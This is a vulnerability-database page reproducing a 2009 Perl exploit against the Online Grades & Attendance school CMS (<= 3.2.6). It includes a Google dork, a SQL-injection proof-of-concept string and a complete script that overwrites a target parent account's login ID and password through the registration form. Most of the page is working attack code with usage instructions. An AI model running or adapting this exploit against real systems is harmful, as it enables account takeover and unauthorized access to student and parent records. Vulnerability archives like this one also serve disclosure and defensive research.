Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21919
HistoryJun 01, 2009 - 12:00 a.m.

(Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades & Attendance v-3.2.6-->

2009-06-0100:00:00
vulners.com
64
JSON

#!/usr/bin/perl
#-------------------------------------------------------------------------------------------------------------------
#(Post Form –> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT – Online Grades &
Attendance v-3.2.6–>
#-------------------------------------------------------------------------------------------------------------------

#CMS INFORMATION:

#–>WEB: http://www.onlinegrades.org/
#–>DOWNLOAD: http://www.onlinegrades.org/
#–>DEMO: http://www.onlinegrades.org/demo_info
#–>CATEGORY: CMS / Education
#–>DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same

features plus many new features. OG is a web based grade…

#–>RELEASED: 2009-02-05

#CMS VULNERABILITY:

#–>TESTED ON: firefox 3
#–>DORK: "Powered by Online Grades"
#–>CATEGORY: SQL INJECTION
#–>AFFECT VERSION: <= 3.2.6
#–>Discovered Bug date: 2009-05-21
#–>Reported Bug date: 2009-05-21
#–>Fixed bug date: Not fixed
#–>Info patch: Not fixed
#–>Author: YEnH4ckEr
#–>mail: y3nh4ck3r[at]gmail[dot]com
#–>WEB/BLOG: N/A
#–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
#–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

#------------
#CONDITIONS:
#------------

#gpc_magic_quotes=OFF

#-----------------
#PRE-REQUIREMENTS
#-----------------

#Option –> Self Registration –> Allowed (Default value)

#-------
#NEED:
#-------

#Valid parent id

#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------

#Register module (name) is vuln to sql injection.

#Full name –> y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'#

#Other parameters –> something

#Return: Change client_id to 'owned' for parent id=1

#######################################################################
#######################################################################
##*******************************************************************##

SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 …

####
##-------------------------------------------------------------------##
####

GREETZ TO: SPANISH H4ck3Rs community!

##*******************************************************************##
#######################################################################
#######################################################################

use LWP::UserAgent;
use HTTP::Request;
#Subroutines
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title Online Grades Attendance v-3.2.6 (Credentials changer)
Exploit");
system ("color 02");
}
}
sub request {
my $userag = LWP::UserAgent->new;
$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
if($[2] eq "post"){
$request = HTTP::Request -> new(POST => $[0]);
$request->referer($[0]);
$request->content_type('application/x-www-form-urlencoded');
$request->content($[1]);
}else{
$request = HTTP::Request -> new(GET => $_[0]);
}
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
print "\t—>Maybe:\n\n";
print "\t\t1.-Patched.\n";
print "\t\t2.-Bad path or host.\n";
print "\t\tEXPLOIT FAILED!\n";
print "\t------------------------------------------------------------\n";
}
sub errormagicquotes {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
print "\t\tRaison–> Magic quotes ON.\n";
print "\t\tEXPLOIT FAILED!\n";
print "\t------------------------------------------------------------\n";
}
sub helper {
print "\n\t[!!!] Online Grades & Attendance <= v-3.2.6 (Credentials changer)
Exploit\n";
print "\t[!!!] USAGE MODE: [!!!]\n";
print "\t[!!!] perl $0 [HOST] [PATH] [Email Address] [Password] [Target_id]\n";
print "\t[!!!] [HOST]: Web.\n";
print "\t[!!!] [PATH]: Home Path.\n";
print "\t[!!!] [Email Address]: Set value\n";
print "\t[!!!] [Password]: Set value\n";
print "\t[!!!] [Target_id]: victim id\n";
print "\t[!!!] Example: perl $0 'www.onlinegrades.org' 'demo' 'y3nh4ck3r' 'y3nh4ck3r'
'1' \n";
}
#Main
&lw;
print "\t#######################################################\n\n";
print "\t#######################################################\n\n";
print "\t## Online Grades & Attendance <= v-3.2.6 ##\n\n";
print "\t## (Credentials changer) Exploit ##\n\n";
print "\t## ++Conditions: magic_quotes=OFF ##\n\n";
print "\t## ++Needed: Valid parent id ##\n\n";
print "\t## Author: Y3nh4ck3r ##\n\n";
print "\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n";
print "\t## Proud to be Spanish! ##\n\n";
print "\t#######################################################\n\n";
print "\t#######################################################\n\n";
#Init variables
my $host=$ARGV[0];
my $path=$ARGV[1];
my $client_id=$ARGV[2];
my $client_pw=$ARGV[3];
$numArgs = $#ARGV + 1;
if($numArgs<=3)
{
&helper;
exit(1);
}
if(!$ARGV[4]){
$target_id=1;
}else{
$target_id=$ARGV[4];
}

#Build uri
my $finalhost="http://".$host."/".$path."/parents/register.php?action=register";
my $phpinfo="http://".$host."/".$path."/include/phpinfo.php";
#sql injection
$injection="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE client_id='".$values."'#";
$post="name=".$injection."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r";
$output=&request($phpinfo,0,'get');
if($output=~(/\<tr\>\<td class\=\"e\">magic\_quotes\_gpc\<\/td\>\<td
class\=\"v\"\>On\<\/td\>\<td class\=\"v\"\>On\<\/td\>\<\/tr\>/)){
&errormagicquotes;
exit(1);
}
$injection_email="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE
client_id='".$client_id."'#";
$post="name=".$injection_email."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r";
$output=&request($finalhost, $post, 'post');
$injection_pw="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE
client_pw='".$client_pw."'#";
$post="name=".$injection_pw."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r";
$output=&request($finalhost, $post, 'post');
#processed
if($output!~(/\<strong\>ERROR\<\/strong\>/))
{
print
"\n\t-----------------------------------------------------------------\n";
print "\t-- EXPLOIT EXECUTED (Online Grades & Attendance <= v-3.2.6) –\n";
print "\t-- (Credentials changer) Exploit –\n";
print
"\t-----------------------------------------------------------------\n\n";
print "\t\tParent credentials changed!\n\n";
print "\t\tIf id doesn't exist, you add a new inconsistent user!\n\n";
print "\n\t<<<<<<----------------------FINISH!---------------->>>>>>>>\n\n";
print "\t<<<<<<--------------Thanks to: y3hn4ck3r------------>>>>>>>\n\n";
print "\t<<<<<<-----------------------EOF-------------------->>>>>>>\n\n";
}else{
&error;
}
exit(1);
#Ok…all job done

JSON